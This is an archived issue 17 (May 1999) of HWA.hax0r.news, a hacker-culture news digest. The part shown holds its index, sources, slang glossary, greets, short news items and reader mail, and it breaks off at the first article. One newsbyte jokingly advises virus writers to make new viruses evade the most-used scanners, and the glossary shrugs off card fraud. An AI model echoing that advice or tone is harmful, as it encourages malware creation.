💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn17.… captured on 2021-12-03 at 14:04:38.
-=-=-=-=-=-=-
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 17 Volume 1 1999 May 8th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... <g> @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #17 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #17 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. The FBI and the secret wiretapping by ENFOPOL.................... 04.0 .. NIPRNET, the DoD considers (yeah considers) installing *gasp*.... FIREWALLS to help thwart the hacker threat....................... 05.0 .. Mainstream press on some of Mitnicks accrued damages............. 06.0 .. CyberCrooks easier to catch?..................................... 07.0 .. NASA doesn't report cyberattacks................................. 08.0 .. Encryption debate called for..................................... 09.0 .. Product: Hackers stopped cold by 'BlackICE'?..................... 10.0 .. FreeBSD 3.1 remote reboot exploit................................ 11.0 .. More on the MSIE favicon.ico bug................................. 12.0 .. Simple Nomad sheds some light on the Phone Masters (not Rangers as reported last week - sorry Ed)................................... 13.0 .. Israeli Sciemtist reports advance in codebreaking................ 14.0 .. Ecommerce risks losing customers if security is not addressed.... 15.0 .. Computer crime threatens the economy??........................... 16.0 .. Cracking the casinos, a Defcon primer? ;) ....................... 17.0 .. Crackers gearing up for attacks on U.S nuke labs?................ 18.0 .. Calling all |<rad hax0rZ!........................................ 19.0 .. Millennium Bug Insurance Hoax.................................... 20.0 .. Y2K Viruses...................................................... 21.0 .. 2 viruses more powerful than CIH by same author 'hidden'......... 22.0 .. Microsoft kept info about a Y2K fix for win95 users quiet........ 23.0 .. Iron Lungs and DK raided by the FBI.............................. 23.1 .. Statement from F0rpaxe (associated with IL)...................... 24.0 .. SIPRNET to be made more secure................................... 25.0 .. U.S Army to teach "Information Survival"......................... 26.0 .. TAKEDOWN gets ready for TAKEOFF.................................. 27.0 .. Free Email vulnerable............................................ 28.0 .. Are consumers worried about online security?..................... 29.0 .. Hotmail Passwords Stolen......................................... 30.0 .. Microsoft IIS 4.0 vulnerability found............................ 31.0 .. [ISN] More on CIH , college student receives demerit............. 32.0 .. [ISN] Taiwan virus suspect free on lack of victims............... 33.0 .. cgichk1.34c modification adds port numbers by 'Joe Hacker'....... 34.0 .. Microsoft Netmeeting Vulnerabilities............................. 35.0 .. IBM AS400+Domino DoS Vulnerability............................... 36.0 .. Gateprobe.c Wingate Scanner by Bong ............................. 37.0 .. Gatescan20.c Wingate Scanner by Misteri0......................... 38.0 .. The BloatWare Debate............................................. 39.0 .. apache.c claims to be a root exploit but actually roots you...... 40.0 .. Cyber-Christ meets Lady Luck. Winn Schwartau in Las Vegas (DefCon II) 41.0 .. Cyber-Christ takes a byte out of the big apple, Winn Schwartau at HOPE 42.0 .. IC2000, Interception Capabilities 2000 and ECHELON............... 43.0 .. WuFTPd exploit w00f.c ........................................... 44.0 .. VirusScan NT advisory from Simple Nomad.......................... 45.0 .. New CorelDraw Virus.............................................. 46.0 .. TWINKLE, the number crunching machine to attack RSA keys......... 47.0 .. 25 fired due to e-mail abuses.................................... 48.0 .. Punishment CIH vs MELISSA ....................................... 49.0 .. World of freedom: an interview with Zero Knowledge Systems by BHZ 50.0 .. Trojan B'Gone.................................................... 51.0 .. The New Generation of Browsers................................... =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. <g> - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it <BeG> Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a> Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a> News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a> Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a> News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a> NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a> News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a> CuD Computer Underground Digest...<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a> News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a> News site+Security................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a> News site+Security................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a> News site+Security................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a> News site+Security related site...<a href="http://www.403-security.org/">http://www.403-security.org/</a> News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a> +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ <a href="http://www.cnn.com/SEARCH/">Link</a> http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 <a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a> http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack <a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a> http://www.ottawacitizen.com/business/ <a href="http://www.ottawacitizen.com/business/">Link</a> http://search.yahoo.com.sg/search/news_sg?p=hack <a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a> http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack <a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a> http://www.zdnet.com/zdtv/cybercrime/ <a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a> http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) <a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a> NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm <a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a> http://freespeech.org/eua/ Electronic Underground Affiliation <a href="http://freespeech.org/eua/">Link</a> http://ech0.cjb.net ech0 Security <a href="http://ech0.cjb.net">Link</a> http://net-security.org Net Security <a href="http://net-security.org">Link</a> http://www.403-security.org Daily news and security related site <a href="http://www.403-security.org">Link</a> Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html <a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a> About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe, visit http://www.counterpane.com/unsubform.html.� Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.� He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09 ����� ��������������������� ISSN� 1004-042X ������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu) ������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) ������ Archivist: Brendan Kehoe ������ Poof Reader:�� Etaion Shrdlu, Jr. ������ Shadow-Archivists: Dan Carosone / Paul Southworth ������������������������� Ralph Sims / Jyrki Kuoppala ������������������������� Ian Dickinson ������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' <see article in issue #4> this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same <coff> Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking <software> C - Cracking <systems hacking> V - Virus W - Warfare <cyberwarfare usually as in Jihad> A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" <sic> 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman and the #innerpulse, #hns crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, <k0ff><snicker> ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Cracker gets Six Months to Three Years From HNN http://www.hackernews.com/ contributed by Sail3 Nicholas Middleton, convicted of breaking into the San Francisco ISP Slip.net and of causing more than $40,000 in damage, will be sentenced by Senior U.S. District Judge William Orrick Jr. on Aug. 4. Middleton is likely to receive six months to three years in jail. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2254225,00.html ++ People keep hacking the "10 Things I Hate About You" site From HNN http://www.hackernews.com/ contributed by Jimmy Riley Seems the owners of the site are getting angry that it is getting hacked. Instead of issuing warnings that it might go away if hacked again why not just fix the site? 10 Things I Hate About You http://movies.go.com/10things/today/index.html ++ How to infect the most people with your next virus release... Contributed by FProphet CWS POLL MAY 4 1999 What virus scanner do you currently use? 282 44.1% McAfee VirusScan 251 39.1% Norton AntiVirus 27 4.2% I don't use a virus scanner 22 3.5% AntiViral Toolkit Pro (AVP) 17 2.6% InoculateIT 12 1.8% Other 10 1.5% Thunderbyte AV 8 1.2% F-Secure 8 1.2% Inoculan 2 0.3% Panda AntiVirus Total Votes: 639 Wow, eh? Now if you want to write a virus, make sure it isn't detected by those and you'll be laughing! <g> ++ NSA Technology Transfer Program From HNN http://www.hackernews.com/ contributed by weld Who says the NSA never does anything for the commercial sector? Here are technologies that you the taxpayer has funded that the NSA has released for all to use. Examples include a compact fingerprint scanner, drive controlled disk sanitation, IPSEC, and of course some crypto applications. Just think if they are giving out this stuff what other cool things must be classified. Technology Transfer Fact Sheets http://www.nsa.gov:8080/programs/tech/toc.html ++ DISA redesigning their protocol to stop hackers By Astral 04.05.1999 17:55 http://www.403.security.org/ DISA is planing to redesign their Non-Classified Internet Protocol Router Network (NIPRNet) to stop hackers.Like HNN wrote they are probably going to install few firewalls to stop hackers. ++ CIH destroyed your data ? By Astral 03.05.1999 13:18 http://www.403-security.org/ A Bangladesh student wrote program that is able to recover data destroyed by CIH virus.Program is called "MRECOVER" and it will posted on the Internet.He also sad that program is able to recover all data successfully in just few minutes.So if CIH destroyed your data you are saved :-) (no url) ++ AOL REWORKS SPAM TEAM (TECH. May 4th 9:15 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/19471.html Long praised for cracking down on spammers, AOL is now cutting back its junk email task force. Does a reorg mean more or less spam for the Net? By Chris Oakes. ++ SPACE STATION BACK ON TRACK (TECH. 9:15 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/19482.html Things are looking up for the International Space Station. The Russian Space Agency worked out its shaky financing and will participate with NASA in the next mission on 20 May. By Polly Sprenger. ++ Y2K new motive for virus writers http://www.403-security.org/ Astral 05.05.1999 14:50 Sunday time published article about Y2K viruses.Not Y2K viruses, the Y2K motives for viruses.Like Mellisa was working, sending e-mails with password to adult sites Y2K viruses would spread on same way but this time by sending .exe Year 2000 postcards. ++ gH 're hacking very active last few weeks http://www.403-security.org/ Astral 05.05.1999 14:50 This time victim was http://aiis.ameritech.com/. gH are hacking very active last few weeks, we saw lot of their hacks.Mirror of this hack is available on our Hacked Sites section. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: "S. G. R. MacMillan" <mail@sgrm.com> To: <cruciphux@dok.org> Subject: Hacker's resource Date: Thu, 6 May 1999 16:31:02 -0400 I'm considered by many hackers as an essential resource: a defence lawyer who understands digital issues. You might consider a link to my site. __________________________________ S. G. R. MacMillan Barrister For the defence of serious criminal cases http://www.sgrm.com mail@sgrm.com PGP Digital Encryption Supported -=- More great poetry from Liquid Phire!; Delivered-To: dok-cruciphux@dok.org From: "liquid phire" <liquidphire@hotmail.com> To: cruciphux@dok.org Subject: more stuffs Date: Mon, 03 May 1999 18:41:03 PDT Mime-Version: 1.0 Content-type: text/plain; format=flowed; ***i never get any fucking feedback, makes me wonder how many people read my stuffs and dont hate me for it. i'm doubtful on this one, i think it is way to flowery and nice but i have no one to tell me that so here i send it, i need suggestions, just be nice and constructive.*** the computer hums, the darkness fades into bluish light. he stares at the screen, shifting from the pulsating lower bar to the logo displayed above. he closes his eyes and in moments they are teased open by the starting sound. he worships here, his microsoft gods and intel dreams. he comes here for solace; a youth with no direction. this is where he finds the comfort that the 20th century life that he leads deprives him of. he logs onto aol, finds love in virtual eyes and open arms in cyber cafes. he follows the links to reccomended sites, never ventures off the beaten path, but sometimes... late at night when the tv is off and no music finds its way into his room. when the house is quiet and his parents sleep. the time when no one is there to save him, to reassure him, to tell him to look away. he sees the truth hidden in the lies. he feels there is something more... and there is there is freedom, concealed in the shadows. there is beauty, woven into the words. there is hope, the undying hunger for the future. this is the world as it is, not hidden behind billboards. this is life, the thirst for adventure and lust for living. this how it should be, survival of the fittest. phiregod liquidphire@hotmail.com forgive me for all errors i welcome feedback in all forms as long as you can present your opinion and support it. _______________________________________________________________ Get Free Email and Do More On The Web. Visit http://www.msn.com -=- ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include <stdio.h> #include <thoughts.h> #include <backup.h> main() { printf ("Read commented source!\n\n"); /* * Issue #17, 'w00t' * * * * * * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 The FBI and the 